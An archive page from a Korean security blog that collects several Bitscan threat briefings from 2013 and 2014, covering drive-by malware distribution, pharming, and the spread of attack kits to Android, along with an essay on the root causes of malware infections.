태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'bitscan'에 해당되는 글 23건

  1. 2014.03.20 "LTE급 재앙과 광대역 피해가 온다."- 유.무선을 동시에 공격
  2. 2014.03.13 [빛스캔] 한국 인터넷 위협 요약- 3월 2주차
  3. 2013.11.06 빛스캔-2013.11월1주차 한국인터넷 위협 브리핑-요약
  4. 2013.10.08 연목구어(緣木求魚) “문제의 해결은 원인을 제거함으로써 완성된다.”
  5. 2013.10.02 [빛스캔] 9월5주차 한국 인터넷 위협분석 – 관심으로 하향
  6. 2013.09.17 [빛스캔] 2013년 9월3주차 한국인터넷 위협 동향 브리핑-요약
  7. 2013.09.17 정교하고 신속하게 변화되는 파밍 공격 (이젠 개인 차원의 대응을 벗어난..)
  8. 2013.08.14 [빛스캔]2013년8월2주차 한국인터넷 위협 브리핑 요약
  9. 2013.08.08 [빛스캔]2013년 8월1주차 한국 인터넷 위협 분석 브리핑-요약
  10. 2013.06.16 [빛스캔] 2013.6.16 한국 인터넷 대상 악성파일의 C&C 차단 목록
  11. 2013.06.13 [빛스캔] 위협레벨 "경고"에 따른 5차 정보 공유.2013.06.13 - 공개본
  12. 2013.06.04 [경고] 위협레벨에 따른 정보공유 -4차 6.4
  13. 2013.05.28 [빛스캔-bitscan] 5월 4주차 인터넷 위협 브리핑 요약 – Level 4 경고
  14. 2013.05.24 S.Korea millitary service Targeted attack without IE 8 zeroday ,Finally fireeye analysis is wrong.
  15. 2013.05.22 IE 8 노린 제로데이 공격, 국내서 발생 (5월 3주차)
  16. 2013.05.15 [빛스캔-bitscan]2013.5월 2주차 한국인터넷 위협분석 브리핑 요약
  17. 2013.05.08 [빛스캔-bitscan] 2013.5월1주차 한국 인터넷 위협분석 요약
  18. 2013.04.24 [빛스캔] 2013년 4월3주차 한국인터넷 위협 동향 브리핑-요약
  19. 2013.02.14 악성코드 유포 일본을 겨냥하다 – 한류, 악성코드 전파 통로
  20. 2012.06.15 6월 1주차 국내 인터넷 위협 동향 브리핑
  21. 2012.05.24 5월 3주차 공격 동향
  22. 2012.05.22 IBM 해킹에 비춰본 웹서비스 보안
  23. 2012.03.06 웹을 통한 악성코드 감염 분석 :디지털 페스트- 2012

 

"유선 웹에서만 발생되던 대량 감염 시도가 모바일 분야로 확장을 하고 있다. 이제 모바일 좀비폰도 출현 할 것이다."

 

PCDS: 한국 인터넷 위협을 모니터링 하는 사전위협 탐지 체계

 

 

 

 

 

 

 

 

 

 

[그림 1. PCDS 체계 요약도]

 

  • 유포지(웹사이트): 웹사이트 내에 경유지가 삽입되어 방문만으로도 실제 감염이 일어날 수 있는 곳
  • 경유지(악성링크): 악성링크를 통해 감염시키는 통로로, multi-stage 및 single로 이루어진 비정상 링크
  • 경유지(공격코드): 경유지(악성링크)내에 공격코드를 삽입시켜 일반사용자 PC의 다양한 애플리케이션 취약점을 공격한다. 공격 성공 시에는 악성파일이 실행되어 PC를 감염시키고, 경우에 따라 C&C 서버로 연결된다.

 

웹은 웹이다.

모바일이든 유선이든 웹은 그냥 웹이다.
한국 내에 스마트폰 사용자 90% 이상이 안드로이드 ( 그냥 애플 빼고 전부) 사용자인데 ..지금까지 모바일에선 스미싱 정도가 전체의 위협으로 알려 져왔다.

지난 주부터 탐지 되는 악성링크에는 이제 유선 ( Java 7 , IE 1 , Flash 1) 접속 시에 공격이 발생되는 이외에도 안드로이드를 겨냥한 apk 세트까지 장착.

 

[그림 2. 2014년 3월13일 발견된 유.무선 공격 세트]

[그림 3. 2014년 3월13일 발견된 유.무선 공격 세트- apk 파일 내용]


앞으로 변화가 많을 것이다.

모바일에도 이제 스미싱만 막다가..모바일 웹도 보안 위험성에 대해 선별해야 하는 상황이고, 유선은 이미 자체적으로 하기에는 놓은 상황이 아니던가?

   

   


웹은 웹이다.

변화는 극적이게 것이다.

우선 모바일 뱅킹 금융 정보 결제 피해를 강요하는 모바일 악성코드는 스마트폰으로 웹서핑 하는 순간에도 설치 된다. 결국은 스미싱이 문제가 아니라 이젠 모바일 웹까지도 영향권에 직접 들어간다는 이야기. 모바일 바라보던 세계 보안 기업이나 국내 서비스 기업들 찌게 되는 것은 순식간이다.

유선 인터넷은 그냥 말을 말자.

모바일 부분에서 통신사는 이제 직접적인 영향을 받을 것임 . 경우에 따라 모바일 관련된 DHCP 서버나 DNS 서버등이 금융정보 탈취 이외에도 직접적인 공격의 대상이 있다. 통제 범위가 이젠 인터넷 웹서비스 전반을 봐야만 하는 상황
그리고 모바일 뱅킹은 어쩔 것인가? ..

이럴 때가 것을 알고서 구글이 준비한 Stopbadware 디비가 안드로이드 이외에도 크롬 브라우저에 모두 탑재 되어 있지만 항상 말하듯이 뒷북 이다. 그리고 이걸 쓰려면 제조사든 통신사든 천문학적인 비용을 내야 수도 있다. 그들이 이럴 쓰려고 준비해 비장의 무기가 아니던가?

 

 


[그림 4. 구글의 악성링크 DB - Stopbadware]


구글은 2006년부터 준비했는데 생각이나 하고, 노력한 곳은 있는가? 아님 대항할 무기라도 대비해 곳이나 있는가? 없을 꺼다. 기술로 뛰어난 설계로 커버 있는 범위는 한참 전에 끝났다. 모든 것은 변화되는 위협을 관찰하고 실시간으로 갱신 되는 데이터베이스가 있는 가에 의해서 판가름 것이다


 

[그림 5. 구글의 Stopbadware 기반 Chrome 차단 화면 – 모바일에서는 언제쯤?]

 


멀리 바라보지 못하고, 준비하지 못했다면 사뭇 운명은 빠른 속도로 처참해 진다. (* 그렇게 노래 부르던 LTE 처참의 현실화)
이건 .무선을 망라한 몬스터 툴킷의 출현으로 더욱 가속화 되게 된다.
그대로 LTE 급과 광대역으로 열려진 통로로 매우 빠르게 확산되고 지속될 것이다. 피해는 전체에 영향을 미친다.

결국 도망만 다니고 편한 길만 찾아 다니다 막다른 절벽에 몰린 상황
아무도 구해 주지 않는다. !

이야기는 아주 빠르게 현실화 것이다. 당장 영향은 상반기에도 직접 느낄 있을 것이다. 그게 바로 선진국(?) 위대함이다.

Posted by 바다란

한국 인터넷 위협 요약 - 3월 2주차

 

발행일: 2014년 3월 12일

한국인터넷 위협레벨: 경고

 

본 인터넷 위협은 빛스캔㈜에서 운영하는 PCDS (Pre Crime Detect Satellite)를 통해 탐지된 국내 180만여개의 웹서비스와 해외 30만개의 웹서비스에 대한 관찰을 요약한 내용입니다. 현재 인터넷 위협 수준은 '경고'로 지난 주와 동일하게 유지하고 있으며, 주요 특징은 다음과 같습니다.

 

주요 특징(Main Features)

• 신규 유포지, 파급력 감소 – 악성코드 통로는 여전히 존재

• 악성코드 유포지로 지속적인 이용 – 여의도 순복음교회, 케이웨더 등

• P2P사이트를 통한 집중적인 악성코드 유포 – 신규 2곳

• 방송, 언론사 등 통한 악성코드 유포 – 작년 유사 상황과 비교 분석(경인방송국, 아시아뉴스통신, 빅뉴스 등등)

• 파밍 – 레지스트리 조작, 채팅 창을 활용한 사기 활성화

 

 

주간 동향(Weekly Trend)

[표 1. 3월 2주차 한국 인터넷 위협지수]

3월 2주차 전체 발견된 유포지는 증가하였지만 신규 경유지의 감소로 인하여 파급력 역시 감소를 하는 모습을 보였다. 하지만, 영향력의 감소에도 불구하고, 언론매체, 쇼핑몰, P2P 등에서는 악성코드의 유포가 지속되는 현상을 보였다. 특히, 금주에는 지난 3개월 동안 악성코드 유포 이력이 없었던 언론/방송사를 통해 악성코드 유포가 이루어지는 현상이 관찰되었으며, 지속적으로 보안점검을 받는 종교단체 역시 현재까지 문제점을 발견하지 못해 4주 연속으로 악성코드를 유포하는 모습을 보였다. 추가적으로 바이너리 확인결과 대부분이 파밍 악성코드로 확인이 되었으며, 바이러스토탈(VirusToal)에서 조회결과 국내백신에서 탐지하지 못하는 것을 확인하였다. 금주 신규 경유지와 영향력은 감소하였지만 언론/방송사를 통한 악성코드 유포와 함께 지속적인 사이트 재감염 사례 등 위협요소가 남아있어 인터넷 위협수준을 "경고" 단계로 유지한다.

[표 2. 3월 2주차 시간대별 통계]

시간대 별 통계를 살펴보면 지난주 주말기간 활발히 활동했던 모습에 비해 금주에는 평일에 활동을 하였으며 활동도 소규모로 이루어지는 모습이 관찰되었다. 하지만, 기존 악성코드 유포지로 활용되었던 사이트의 통로는 현재도 존재하고 있기 때문에 위협이 낮아졌다고 판단하기는 이른 상황이다.

 

[표 3. 최근 1달 악성링크 도메인 통계]

2월 1주차부터 3월 2주까지의 최근 6주 동안의 주요 국가별 경유지(악성링크) 도메인 통계를 살펴보면, 누적 수는 한국이 156건(16.9%)으로 지난주와 소폭 증가하였으며, 미국이 380건(40.6%), 독일이 150건(16.0%), 이탈리아가 51건(5.5%), 스페인이 43건(2.8%), 브라질이 20건(2.1%), 일본이 19건(2.0%), 러시아가 17건(1.8%), 네덜란드가 16건(1.7%), 덴마크가 13건(1.4%), 영국이 12건(1.3%), 폴란드가 10건(1.1%), 기타가 61건(6.1%) 등으로 나타났다.

 

 

주간 이슈(Weekly Issue)

[그림 1. 파밍 정보 입력 후 나타나는 채팅창 – 3월 5일]

 

최근 국내 영향력 있는 웹사이트를 통해 악성코드가 유포되는 상황이 지속적으로 관찰되고 있으며 이를 통해 다운로드 된 악성코드는 대부분 파밍 악성코드로 확인되고 있다. 파밍 악성코드는 지난해부터 등장하기 시작했으며 매주 새롭게 바뀌는 모습이 나오고 있다. 지난주 카드사를 사칭한 파밍사이트의 등장과 일부 보안업체를 이용하려는 정황에 이어서 금주에는 파밍 사이트에서 모든 정보를 입력 후에 새롭게 채팅창이 나타나는 모습이 발견되었다. 특히, 채팅창은 우리은행에서만 나타난 것이 아닌 새마을금고를 통해서도 나타났으며 향후에는 모든 파밍 은행 사이트에서 이 와 같은 공격이 나타날 것으로 예상된다.

 

 

정보제공 서비스

소개

국내외 210여만개(국내 180만, 해외 30만) 웹사이트를 통해 발생되는 대량 감염시도와 워터링홀 공격을 실시간으로 탐지하여 공격에 대한 이슈, 실제 범위 및 미치는 영향 등을 주간 단위로 분석하여 제공하는 정보제공서비스

 

서비스 유형

  • 한국 인터넷 위협 요약 – 한 주간의 공격 동향 및 새로운 공격 형태 정보 요약
  • 한국 인터넷 위협 분석(동향) – 월 최소 4회 제공
  • 한국 인터넷 위협 분석(기술) – 공격 기법 및 구조 분석 제공
  • 좀비PC탐지정보 – APT 및 DDoS 관련 정보제공, 매일 제공
  • 제공해킹 탐지 Alert 서비스 - PCDS에서 탐지된 악성 URL DB를 활용하여 해킹 여부 제공

 

제공 시기

  • 정기 - 주 1회(수요일)
  • 비정기 – 인터넷 위협 수준이 "4단계. 경고" 이상일 경우. 고객사 대상 수시 발송

 

무료

       한국 인터넷 위협 요약 – 주간 브리핑 보고서의 내용을 2장 분량으로 요약제공 (정기)

  • 긴급 정보 제공 – 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 (수시, 선별된 정보만 제공)

    2014년 1월 이후에는 "5단계 사고 발생" 시에만 긴급 정보제공 ( 수시, 선별된 정보 제공) 

 

정기 신청기업(유료)

  • 스탠다드 – 한국 인터넷 위협 요약, 동향분석, 기술분석
  • 엔터프라이즈 – Daily base C&C 정보, 한국 인터넷 위협 요약, 동향분석, 기술분석, 전문분석, 좀비PC탐지정보, 악성코드 샘플

    악성코드 샘플은 별도 협의

 

 문의

  • 무료 신청을 원하시는 경우 info@bitscan.co.kr 로 연락주십시오.
  • 정기 신청 및 관련 사항 문의는 "회사 이메일"을 통해 info@bitscan.co.kr

    연락주십시오.

 

감사합니다.

Posted by 바다란

* 증가되는 확연한 현상이 보이시나요? 위협수준을 상향 시킨 이후 지속 되고 있는 형태입니다.

인터넷 위협 수준: 관심

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

<주간 유포된 도메인 수>

11월 1주에 전체 발견된 유포지(웹사이트)와 신규 경유지(악성링크)는 지난주에 비해 대폭 증가하였다. 특히, 발견된 신규 악성링크에서는 지난 주에 활발하였던 IE 제로데이를 이용한 공격이 감소한 반면, 공다팩의 사용률이 증가하였다. 또한, 금주에는 공다팩이 3중으로 사용되는 멀티스테이지 공격이 발생한 가운데, 8월부터 나타난 동일 바이너리로 연결하는 악성링크도 재출현하였으며 지속적인 탐지 회피를 위해 바이너리 및 악성링크를 변경하는 정황도 포착하였다. 더불어, 발견된 바이너리의 분석 결과 다수의 도메인으로 연결되고, 이들은 하나의 C&C 서버로 연결되고 있었다. 또한, 연결 후에는 추가 바이너리를 다운로드 하는 모습이 관찰되었다. 금주 악성링크의 증가와 함께 다양한 공격방식으로 인한 위협이 관찰되어 인터넷 위협 수준을 "관심" 단계 그대로 유지한다.

 

<시간대별 통계>

시간대별 통계를 살펴보면 지난주 소규모의 유포를 보였던 악성링크의 활동이 금주에는 모든 시간대를 활용하여 유포하는 모습이 나타났다. 특히, 화요일 오전 ∼ 저녁 사이, 목요일 오전 ∼ 금요일 저녁까지 가장 활발한 활동을 보였다.

<최근 1달 악성링크 도메인 통계>

9월 5주차부터 11월 1주까지의 최근 6주 동안의 주요 국가별 경유지(악성링크) 도메인 통계를 살펴보면, 누적 수는 한국이 160건(69.9%), 미국 49건(21.4%), 폴란드 10건(4.4%), 일본 2건(0.9%), 독일 2건(0.9%), 영국 2건(0.9%), 오스트레일리아 2건(0.9%), 싱가포르 2건(0.9%) 등으로 나타났다.

 

<주간 악성링크 도메인 통계>

국가별 경유지(악성링크) 도메인 통계를 분석한 결과 한국이 45(60.8%), 미국 19(25.7%), 폴란드 5(6.8%), 일본 1(1.4%), 영국 1(1.4%), 독일 1(1.4%), 오스트레일리아 1(1.4%), 싱가포르 1(1.4%)등이 나타났으며, 특히, 레드킷의 활동으로 다양한 국가 도메인이 활용된 것으로 분석되었다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는 info@bitscan.co.kr 로 연락주십시오.

감사합니다.

 

 

고급보안정보구독서비스

소개

국내외 180여만개(국내 150만, 해외 30만) 웹사이트에서 발생하는 해킹, 변조, 침해사고를 탐지하여 공격에 대한 이슈, 실제 범위 미치는 영향 등을 주간 단위로 분석하여 제공하는 정보제공서비스

 

서비스 유형

  • 주간 브리핑 악성코드 유포 범위와 경유지, 국내에서 많은 영향을 미치는 이슈를 중점 서술
  • 동향 분석 - 한 주간의 공격 동향에 대한 요약과 새로운 공격 형태 정보 기술
  • 기술 분석 - 한 주간의 악성링크와 악성파일에 대한 실행 기반의 분석 정보 기술
  • 전문 분석 새로운 공격 기법이나 제로데이 출현시 수시로 제공
  • C&C 봇넷 정보 APT 및 좀비 PC에서 이용되는 네트워크 연결 정보(callback)
  • 악성코드 샘플 감염 공격 악성파일에 대한 샘플(스크립트, 익스플로잇, 악성바이너리)

 

제공 시기

  • 정기 - 주 1회(수요일)
  • 비정기 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 수시

 

무료 구독자

  • 주간 브리핑 요약 주간 브리핑 보고서의 내용을 2장 분량으로 요약제공 (정기)
  • 긴급 정보 제공 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 (수시)

 

정기 구독자

  • 베이직 주간 브리핑, 동향 분석
  • 스탠다드 주간 브리핑, 동향 분석, 기술 분석
  • 프로페셔널 주간 브리핑, 동향 분석, 기술 분석, 전문 분석
  • 엔터프라이즈 주간 브리핑, 동향 분석, 기술 분석, 전문 분석, C&C 봇넷 정보

악성코드 샘플은 별도 협의

 

구독 문의

 

감사합니다.

Posted by 바다란

연목구어(緣木求魚) "문제의 해결은 원인을 제거함으로써 완성된다."

-바다란

  * 언론에 기고한 내용입니다.

정확한 문제의 해결을 위해서는 원인을 알고 제거를 있어야 해결이 된다. 문제는 산적해 있으나 해결 방안은 근본 원인에 접근을 하지 못할 문제의 해결은 어려울 수밖에 없다. 더구나 피해가 전체에 영향을 미치는 상황이라면 심각성은 말할 필요가 없을 것이다.

 

 

악성코드로 인한 피해가 심각한 상황임은 2013 올해 들어서 일어난 가지 대형 사건으로도 충분히 입증된 바가 있다. 방송과 금융을 직접적으로 노리고 피해를 입힌 3.20 대란과 6.25사건은 방송과 금융은 물론 한국의 중요 기관 조차도 위험의 중심부에 있음을 여실히 보여준 바가 있다. 직접적인 공격 이외에도 일반 사용자를 대상으로 하는 금융정보 탈취의 경우에도 이미 올해 상반기만에 지난해 전체의 피해를 넘어서는 피해액을 보이고 있는 상황을 지금의 한국 인터넷 환경의 위험도는 조절 있는 상황을 넘어선 것이 아닌가 하는 우려가 든다.

 

주에만 악성코드를 감염 시키는데 이용 되는 악성링크가 최소 200 이상이 발생 되고 영향을 받는 사이트가 천여 개에 이르는 상황에서 일반 사용자가 안심 있는 인터넷 이용 환경은 매우 제한 적이다. 일상적인 웹서핑 상황에서도 악성코드에 감염될 있는 Drive by download 접속만으로도 감염이 된다. 모든 악성코드는 감염 시도 이전에 한국 내에서 사용되는 주요 백신에 대해 탐지 여부를 확인 하고 유포 함으로써 감염률을 극도로 높이고 있는 실정이다.

 

방문자가 많은 사이트를 대상으로 악성코드 감염에 이용하고 있고, 주요 백신에 대해 탐지 여부를 확인 함으로써 감염율을 높인다. 또한 감염 이후에는 금융 정보 탈취 이외에도 원격에서 조정이 가능한 백도어까지 심어둠으로써 추가적인 정보 획득 및 내부 침입을 위해 적극적으로 활용을 한다. 최근 공격자가 다수의 백도어 감염 PC를 조정하는 서버를 역으로 관찰한 바에 의하면, 의료 분야뿐 아니라 기업의 중요 기밀이라고도 할 수 있는 설계도 및 내부 인트라넷을 이용하는 화면을 모니터링 하고 있는 것이 확인 되었다. 일반적으로 산업 기밀에 대한 유출은 보통 사람을 통해 저장된 매체를 통해 유출 하는 것이 대부분으로 알려져 있다. 그러나 이번 확인을 통해 공격자가 내부의 PC를 완벽하게 제어하는 것을 통해서 더욱 많은 정보들이 노출 될 수 있는 상황에 처해 있음이 확인 되었다. 지난 3.20 대란의 경우에도 내부로 침입한 이후에 실제 피해를 발생 시킨 것으로 확인 되었으나 아직까지 내부망으로 어떻게 침입 하였는지에 대한 확인은 된 바가 없다. 그러나 최근 공격자들이 운영하는 서버에서 확인된 결과에 의하면 전체 감염 PC의 상당수가 사설 IP를 이용하는 내부망의 PC라는 점에서 개연성은 일부 추정이 가능하다.

 

이메일을 통한 특정 대상에 대한 감염 시도와 웹을 통한 불특정 다수를 겨냥한 감염 시도는 피해의 범위에서 현격한 차이를 보일 수 밖에 없다. 현재 금융 정보 탈취에 이용되는 파밍 관련 피해가 급증하고 사회적 문제로 대두되고 있는 것은 불특정 다수를 겨냥한 감염 시도가 사회적 영향을 주고 있기 때문일 것이다.

 

웹서핑을 통해 감염 되는 악성파일을 설치된 백신이 탐지 하지 못하고 공격자에 의해서 원격에서 제어되는 상태에 놓이게 되는 상황과 인터넷 뱅킹을 이용하거나 사용자 정보를 입력하는 모든 순간을 지켜 보고 있으며, 정보를 빼내어가고 심지어는 원격에서 직접 제어를 함으로써 추가적인 정보탈취가 직접 가능한 상황은 악몽에 가깝다. 지금까지의 피해 예방을 위한 대책으로는 이메일의 첨부 파일을 클릭 하지 말거나, 불법 파일 다운로드를 하지 말아야 한다는 정도의 대책이 대부분 이였다. 그러나 실제로 발생되는 공격들은 대책과는 한참 동 떨어져 있다. 문제의 원인 파악이 제대로 되어 있지 않은 대책이라 할 수 있다.

 

PC에 설치되는 백신을 믿을 수 밖에 없는 개인 사용자들과 각종 보안장비 (IDS , IPS, Web Firewall) 등을 믿을 수 밖에 없는 기업의 현재 상황은 안타까움을 넘어 위험에 처한 상황으로 보인다. 백신 탐지를 우회하고 내부 사용자를 노리고 공격하는 악성코드들에 무력할 수 밖에 없는 보안장비들은 현재 위험의 원인을 제어할 수 없는 상황이다.

 

접속만 해도 감염되는 악성코드의 경우에도 사용자의 클릭과 같은 행동 없이도 자동으로 공격이 발생된다. 접속만 해도 자동적으로 공격이 발생 되는 상황은 Java, Flash, IE 브라우저의 취약성을 적극적으로 이용한다. 공격자들은 정상적인 웹사이트들을 공격하여 공격에 이용되는 코드를 넣어둔다. 그 이후 방문 하는 모든 사용자들은 즉시적인 공격의 대상이 된다. 지금의 상황을 살펴보면 대책들은 웹서비스를 통한 대량 감염을 통제하기에는 한계가 있는 상황이다. 개인과 기업 차원의 보호 대책도 현재의 위험을 통제하기 위해서는 다른 형태의 보호 방안을 강구해야만 할 상황에 처해 있다. 위험을 외면 해서는 3.20, 6.25와 같은 직접적인 공격에 노출 되고 기업의 기밀도 순식간에 유출 될 수밖에 없다. 위험은 통제 범위를 벗어난 상황이 현재다.

 

접속만 해도 감염이 되는 상황이며, 어떤 사이트에서 공격이 발생 되는지에 대해서도 알 수가 없다. 그리고 최종 악성파일 조차도 주요 백신들의 탐지를 우회하는 상황이며, 수시로 악성파일을 변경 하고 있다. 현재는 개인 사용자들의 피해가 급증하고 있으나, 머지않아 기업/기관들의 정보 유출 및 추가적인 사고들도 연속해서 이어질 가능성이 높다. 적극적인 대책들을 실행 하지 않는다면 문제는 향후에도 계속 될 수 밖에 없을 것이다.

 

개인차원에서 믿을 수 있는 것은 백신뿐이지만 금융정보 탈취 가능성을 최소화 하기 위해서는 노력이 필요하다.

 

  1. 운영체제 및 백신의 업데이트를 항시 최상으로 유지
  2. Java ,Flash , IE의 업데이트를 최신으로 유지
  3. 공인인증서는 별도의 매체에 보관하며, 보안카드는 오프라인으로 보관한다.

 

위의 세 가지 대책 이외에는 개인 차원에서 노력 할 수 있는 것은 없는 상황이다. 기업 차원에서는 웹을 통한 악성코드 감염 이슈에 대해서 사전 예방에 적극적인 노력을 해야만 한다. 감염 이후에는 제한적인 대응만이 가능한 상황이라 기존의 보안 장비들에 대한 지속적인 관리와 갱신 이외에도 내부 사용자들을 보호할 수 있는 방안들에 대해서 적극적인 노력을 해야만 할 것이다.

 

구글의 크롬 브라우저에서 볼 수 있듯이 악성코드 감염 시도가 발생되는 웹서비스에 대해서 경고하는 사전예방 서비스는 충분히 효과적이라 할 수 있다. 비록 공격자들의 잦은 변경과 변화에 대해서는 무용지물이지만 없는 것 보다는 나은 상황이라 할 것이다. 웹을 통해 목적을 가진 동일한 악성코드를 대량으로 유포하는 이슈는 기업은 물론이고 산업과 국가 차원에서도 적극적인 대응을 해야만 문제를 최소화 할 수 있다.

 

장기적으로는 악성코드 유포에 이용되는 웹서비스들의 문제점을 지속적으로 해결 할 수 있도록 관리 체계가 구성 되어야 할 것이다. 단기적으로는 감염이 발생되는 초기 단계에서 적극적으로 공격 링크를 확인하고 대응 함으로써 감염 범위를 줄여야만 문제를 최소화 할 수 있다.

 

문제가 있다면 원인을 찾는 것이 기본이다. 원인을 찾지 못한다면 문제는 전혀 해결 되지 않는다. 금융정보 유출과 같은 피해를 사용자의 부주의로 돌리는 상황이라면 앞으로도 기업이나 기관에서 발생될 3.20과 6.25와 같은 충격적인 피해는 피할 수가 없을 것이다. 연목구어는 지금의 상황을 대변한다.

2013.10.7

 

 

Posted by 바다란

인터넷 위협 수준: 관심

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

<주간 유포된 도메인 수>

9월 5주차 신규 악성링크는 조금 증가하였지만, 전체 발견된 악성링크는 9 관찰기간 최저치를 기록하였다. 당사가 보유한 과거 기록을 검토해 보면, 추석 연휴와 다음 주의 활동이 미미하였으며, 현상황도 과거와 같은 추세라고 보여진다. 금주에는 긴급정보공유 나타난 전체적인 위협감소를 토대로 "인터넷 위협" 수준을 "관심" 단계로 하향 조정한다.

 

<시간대별 통계>

시간별 통계를 살펴보면 월요일 ∽ 목요일까지 활발한 활동을 보이던 악성링크의 활동은 당사의 정보공유 이 후 목요일 저녁부터 현재까지 악성링크의 활동은 나타나지 않는 모습을 보이고 있다. 특히, 추석 연휴 직전에 확산된 동일한 악성코드로 연결되는 주소 및 C&C 연결 정보 등을 9/25(수)에 "긴급정보공유" 보고서를 통해 공유하였으며, 이에 대한 대응으로 추정하고 있다. 그 이후 악성링크의 활동이 거의 전무한 상태로 지속되고 있다.

 

<최근 1달 악성링크 도메인 통계>

8월 4주차부터 9월 5주까지의 최근 6주 동안의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 268건(81.2%), 미국 27건(8.2%), 일본 30건(9.1%), 홍콩 3건(0.9%), 대만 1건(0.3%), 영국 1건(0.3%)등으로 나타났다.

 

<주간 악성링크 도메인 통계>

국가별 악성링크 도메인 통계를 분석한 결과 한국이 30건(90.9%), 미국이 3건(9.1%) 순으로 나타났으며, 국내서버를 주로 활용한 정황이 꾸준히 관찰되고 있다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는 info@bitscan.co.kr 로 연락주십시오.

감사합니다.

 

고급보안정보구독서비스

소개

국내외 180여만개(국내 150만, 해외 30만) 웹사이트에서 발생하는 해킹, 변조, 침해사고를 탐지하여 공격에 대한 이슈, 실제 범위 미치는 영향 등을 주간 단위로 분석하여 제공하는 정보제공서비스

 

서비스 유형

  • 주간 브리핑 악성코드 유포 범위와 경유지, 국내에서 많은 영향을 미치는 이슈를 중점 서술
  • 동향 분석 - 한 주간의 공격 동향에 대한 요약과 새로운 공격 형태 정보 기술
  • 기술 분석 - 한 주간의 악성링크와 악성파일에 대한 실행 기반의 분석 정보 기술
  • 전문 분석 새로운 공격 기법이나 제로데이 출현시 수시로 제공
  • C&C 봇넷 정보 APT 및 좀비 PC에서 이용되는 네트워크 연결 정보(callback)
  • 악성코드 샘플 감염 공격 악성파일에 대한 샘플(스크립트, 익스플로잇, 악성바이너리)

 

제공 시기

  • 정기 - 주 1회(수요일)
  • 비정기 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 수시

 

무료 구독자

  • 주간 브리핑 요약 주간 브리핑 보고서의 내용을 2장 분량으로 요약제공 (정기)
  • 긴급 정보 제공 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 (수시)

 

정기 구독자

  • 베이직 주간 브리핑, 동향 분석
  • 스탠다드 주간 브리핑, 동향 분석, 기술 분석
  • 프로페셔널 주간 브리핑, 동향 분석, 기술 분석, 전문 분석
  • 엔터프라이즈 주간 브리핑, 동향 분석, 기술 분석, 전문 분석, C&C 봇넷 정보

악성코드 샘플은 별도 협의

 

구독 문의

 

감사합니다.

Posted by 바다란

인터넷 위협 수준: 주의

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

<주간 유포된 도메인 수>

9월 3주차, 전체 발견된 악성링크는 증가하였지만, 신규 악성링크는 9월 1주 이후 계속 감소하고 있다. 하지만, 신규 악성링크가 감소함에도 신규 악성링크 파급력은 지난 주보다 증가하였으며, 그 원인은 MalwareNet과 Multi-stage 공격이 결합된 형태가 다수 이용되었기 때문으로 추정된다. 또한, 공격자는 국내 IP 차단이 어려운 점을 악용하여 직접적인 유포 경로로 국내 사이트를 이용하고, C&C 서버도 국내 서버를 활용하는 정황도 파악되었으며, C&C 서버 연결 후 추가적으로 파밍 악성코드를 다운로드하는 모습도 관찰되었다.

 

<시간대별 통계>

시간별 통계를 살펴보면 지난주에 활동이 뜸하였던 수요일 ∽ 목요일까지 가장 활발한 활동을 보였으며, 금요일부터 일요일까지도 지속적인 활동을 보였다. 또한, 일부 사이트에서는 초기에 대응 조치가 이루어지지 않아 지속적인 유포지로 활용되는 상황도 관찰되었다.

<최근 1달 악성링크 도메인 통계>

8월 2주차부터 9월 3주까지의 최근 6주 동안의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 285건(75.6%), 미국 43건(11.4%), 일본 43건(11.4%), 홍콩 4건(1.1%), 대만 1건(0.3%), 영국 1건(0.3%)등으로 나타났다.

 

<주간 악성링크 도메인 통계>

 

국가별 악성링크 도메인 통계를 분석한 결과 한국이 37건(78.7%), 일본이 6건(12.8%), 미국이 4건(8.5%) 순으로 나타났다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는 info@bitscan.co.kr 로 연락주십시오.

감사합니다.

 

고급보안정보구독서비스

소개

국내외 180여만개(국내 150만, 해외 30만) 웹사이트에서 발생하는 해킹, 변조, 침해사고를 탐지하여 공격에 대한 이슈, 실제 범위 미치는 영향 등을 주간 단위로 분석하여 제공하는 정보제공서비스

 

서비스 유형

  • 주간 브리핑 악성코드 유포 범위와 경유지, 국내에서 많은 영향을 미치는 이슈를 중점 서술
  • 동향 분석 - 한 주간의 공격 동향에 대한 요약과 새로운 공격 형태 정보 기술
  • 기술 분석 - 한 주간의 악성링크와 악성파일에 대한 실행 기반의 분석 정보 기술
  • 전문 분석 새로운 공격 기법이나 제로데이 출현시 수시로 제공
  • C&C 봇넷 정보 APT 및 좀비 PC에서 이용되는 네트워크 연결 정보(callback)
  • 악성코드 샘플 감염 공격 악성파일에 대한 샘플(스크립트, 익스플로잇, 악성바이너리)

 

제공 시기

  • 정기 - 주 1회(수요일)
  • 비정기 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 수시

 

무료 구독자

  • 주간 브리핑 요약 주간 브리핑 보고서의 내용을 2장 분량으로 요약제공 (정기)
  • 긴급 정보 제공 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 (수시)

 

정기 구독자

  • 베이직 주간 브리핑, 동향 분석
  • 스탠다드 주간 브리핑, 동향 분석, 기술 분석
  • 프로페셔널 주간 브리핑, 동향 분석, 기술 분석, 전문 분석
  • 엔터프라이즈 주간 브리핑, 동향 분석, 기술 분석, 전문 분석, C&C 봇넷 정보

악성코드 샘플은 별도 협의

 

구독 문의

 

감사합니다.

Posted by 바다란

정교하고 신속하게 변화되는 파밍 공격.

(포털 배너의 신뢰성을 이용한 금융정보 탈취-)

 

